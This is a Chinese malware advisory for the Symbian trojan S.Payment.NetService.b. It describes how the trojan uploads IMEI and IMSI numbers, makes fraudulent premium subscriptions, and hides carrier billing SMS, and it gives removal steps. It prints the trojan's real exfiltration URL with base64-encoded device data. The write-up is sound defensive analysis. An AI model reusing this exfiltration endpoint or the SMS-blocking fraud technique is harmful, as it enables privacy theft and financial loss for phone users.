S.Payment.NetService.b

影响系统:Symbian S60 (3rd、5th)

病毒描述:

    该病毒安装成功后自动运行于后台。病毒在运行过程中获取用户IMEI、IMSI号码,并联网上传到远端服务器。病毒在运行过程中访问远程服务器中获取订购任务网址,并访问网址进行恶意订购。病毒在运行过程中屏蔽10086发送的回执短信。病毒会常驻手机内存,消耗用户手机CPU资源。

病毒危害:

  1. 病毒在运行过程中获取用户IMEI、IMSI号码,并联网上传到远端服务器,窃取用户隐私。
  2. 病毒在运行过程中访问远程服务器中获取订购任务网址,并访问网址进行恶意订购。具有恶意扣费行为。
  3. 病毒在运行过程中屏蔽10086发送的回执短信,造成系统破坏,同时使用户无法及时收到扣费通知,给用户带来一定的经济损失。
  4. 病毒会常驻手机内存,消耗用户手机CPU资源。具有流氓行为。

病毒运行原理:

  1. 病毒安装成功后无桌面图标生成,在程序管理界面可发现病毒已经成功安装:

          

           在任务管理器中生成进程"NetService.exe"。

 

     2.  病毒在运行过程中获取用户IMEI、IMSI号码,并联网上传到远端服务器,窃取用户隐私。

         (http://s.moononsun.com/login.aspx?  userurl=dXNlcmlkPTAmcGFydG5lcmlkPTAmcHJvY29kZT0yMDAxMTUmdmVyc2lvbj01LjA1Jm9zPXM2MHYzJ

nBob25lPSZpbWVpPTM1OTMyNzAzNTM1NzMwNCZpbXNpPSZ1YT1Ob2tpYUU1Mi0xJlRlbFlFPTEwMCZzbXNjPSs4NjEzODAwMjUwNTAw)

         获取用户手机IMEI号码:

  

         

         获取用户手机IMSI号码:

        

        

         数据经过base64编码:

        

        

         隐私上传地址:

        

      3. 病毒在运行过程中访问远程服务器中获取订购任务网址。具有恶意扣费行为。

       访问服务器显示:

       

        4. 病毒在运行过程中屏蔽10086发送的回执短信,造成系统破坏,同时使用户无法及时收到扣费通知,给用户带来一定的经济损失。

        设置拦截短信:

        

         获取短信号码:

         

         拦截用户手机短信:

           

        屏蔽短信号码:

       

        删除短信:

        

       5. 病毒安装成功后在后头生成进程"NetService.exe"并常驻手机内存,消耗用户手机CPU资源。

        

       解决方案:

       打开手机设置选项,依次选择【安装】—【程序管理】,在其中找到” NetService.exe”,依次点击【强制停止】—【删除】,然后点击【清除数据】确保软件被清除干净,同时去手机路径c:\sys\bin目录下,删除相关程序。

转载于:https://www.cnblogs.com/xiaojinma/archive/2012/12/26/2834927.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值